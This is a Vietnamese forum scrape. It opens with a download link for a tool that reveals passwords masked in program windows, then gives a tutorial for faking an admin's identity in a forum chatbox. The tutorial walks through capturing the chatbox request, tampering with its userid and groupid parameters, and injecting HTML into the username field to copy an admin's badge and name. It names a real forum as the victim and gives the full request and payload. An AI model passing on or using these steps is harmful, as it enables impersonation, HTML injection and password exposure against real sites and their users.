Tool rất dễ sử dụng chỉ việc kéo rê công cụ hình "tầm nhắm" đến nơi cần giải mã và password sẽ hiện ngay trên chương trình.(Xem hình)
 http://www.mediafire.com/?3qwm13wsor68tlr

Nguồn: http://www.nhiemdoc.net/2012/07/snadboys-revelation-20-giai-ma-password.html#ixzz249ozbzoB

[TUT] Hướng dẫn Fake nick Admin trên Chatbox

Ai bít rùi thì thi, cái này chỉ để nghịch chứ cũng ko lam gì đến rum!
*Lấy link chatbox em ko biết anh em dùng cái gì để lấy, em thì dùng Live HTTP Headers (các bạn lên google tìm). Reg nick mới, log vào rum. Bật live HTTP headers lên, rùi chát một câu gì đấy, xem lại ở live HTTP sẽ hiện link chatbox mình vừa chat 

Vic tim bây giờ là: forum.100c.vn
 Đây là đoạn Live HTTP Headers trả về cho mình. Các bạn chỉ chú ý đến đoạn màu xanh thôi, có dạng http://victim.com/chatbox/index.php?do=postshout&key=&userid=1&groupid=6&message=hi&username=abc&color=black&font=&bold=B*&italic=I&underline=U
http://i1269.photobucket.com/albums/jj591/goforum/Untitled-6.jpg 
Sau khi có link rồi thì vào link chatbox vừa có, thêm đoạn code sau:
 ?do=postshout&key=&userid=1&groupid=6&message=hi&username=abc&color=black&font=&bold=B*&italic=I&underline=U
Usename= các bạn có thể chèn HTML. Vd ở đây mình muốn giả làm nick admin thì lấy code nick của admin:
<img src="http://100c.vn/admin4.gif" border="0"> <font color="red"><b>admin tân</b></font>
Message= là nội dung bạn muốn chat
http://i1269.photobucket.com/albums/jj591/goforum/Untitled-7.jpg